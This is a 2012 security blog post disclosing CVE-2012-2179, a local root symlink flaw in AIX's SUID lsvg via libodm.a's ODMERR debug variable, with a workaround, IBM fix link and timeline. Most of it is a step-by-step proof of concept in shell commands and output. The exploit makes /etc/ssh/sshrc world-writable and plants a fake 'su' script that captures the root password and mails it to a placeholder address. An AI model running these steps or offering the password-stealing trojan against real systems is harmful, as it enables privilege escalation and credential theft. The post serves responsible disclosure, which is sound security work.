Archive for July, 2012

CVE-2012-2179: lsvg(1) AIX61/71 – libodm.a vulnerable due to the ODMERR env

Thursday, July 12th, 2012

This is new local attack for at least AIX 6.1 / 7.1 or at least there were enough time for anyone seriously considering security to patch their systems (IBM released info on 2012-06-22, today is 2012-07-12) … this is typical arbitrary file overwrite symlink vulnerability due to libodm.a bug giving local root. libodm.a (in this case used by SUID lsvg) performs an getenv(“ODMERR”) – undocumented env variable – which if is set triggers the debug code to dump the contents of debug log message generated in runtime by libodm.a to always the same file – ODMTRACE0 (or ODMTRACE1, etc) in current runtime directory (seems to be related to getcwd()). Proof:

guest@XXX:# oslevel -s
7100-00-03-1115
guest@XXX:# export ODMERR=1
guest@XXX:# ln -s /etc/ssh/sshrc ODMTRACE0
guest@XXX:# ls -l
total 0
lrwxrwxrwx    1 install  staff            14 Dec 22 05:42 ODMTRACE0 ->
/etc/ssh/sshrc
guest@XXX:# umask 0000
guest@XXX:# lsvg
rootvg
appvg
guest@XXX:# ls -l
total 0
lrwxrwxrwx    1 install  staff            14 Dec 22 05:42 ODMTRACE0 ->
/etc/ssh/sshrc
guest@XXX:# head -3 ODMTRACE0
 __odm_initfini_init: Start
 __odm_initfini_init: End
 odm_set_path: Start
guest@XXX:# ls -l /etc/ssh/sshrc
-rw-rw-rw-    1 root     staff          7332 Dec 22 05:42 /etc/ssh/sshrc
guest@XXX:#
guest@XXX:# vi /etc/ssh/sshrc
# a lot of typing
guest@XXX:# cat /etc/ssh/sshrc
#!/bin/sh
# proof of concept for lsvg(1) AIX61/71 0-day exploit, 22/12/2011, vnull
#
# /etc/environment usually sets PATH from scratch so we have to
# cheat via ~/.profile which is read by user's shell at later stage
#

mkdir /tmp/$$
cat > /tmp/$$/su << EOF
#!/bin/bash
#this would be a su backdoor sendming email or transmiting pw over dns...
echo -e "root's Password: \c"
stty -echo
read PW
stty echo
echo
#echo your PW is \$PW
echo \$USER \$HOSTNAME \$PW | mail -s cookie your@email.com >
/dev/null 2>&1
echo '[compat]: 3004-300 You entered an invalid login name or password.'
echo
echo '3004-501 Cannot su to "root" : Authentication is denied.'
rm -f /tmp/$$/su
exit 0
EOF
chmod 755 /tmp/$$/su

cat >> ~/.profile << EOF
export PATH=/tmp/$$:$PATH
EOF

guest@XXX:#

How does it work? If the above attack is performed, and somebody else logs in using ssh remotely (root or just simple user), then /etc/ssh/sshrc contents are executed (by sshd) with his privilege level. In this case PATH is altered to hijack “su” executions and obtain potentially password. This could be also adapted e.g. to catch “sudo” password too.

Potential workaround: drop all SUIDs from all binaries linked to libodm.a (yes i find it kind of hard due to need of dropping even SUID from lsvg, which may break a lot of IBM/3rd software, especially some agents using commands such as lsvg to monitoring stuff.

Fixed via CVE-2012-2179, more info here http://aix.software.ibm.com/aix/efixes/security/libodm_advisory.asc

Still IBM AIX doesn’t come with proper hardened protection against /tmp races as mentioned in previous blog entry about CVE-2011-1384. Timeline: almost 180 days to fix for IBM.

BTW: This proof of concept could be easily adapted to give instant root (as you can create any file that does not exists), but I’m not going to disclose weaponized versions.

-J.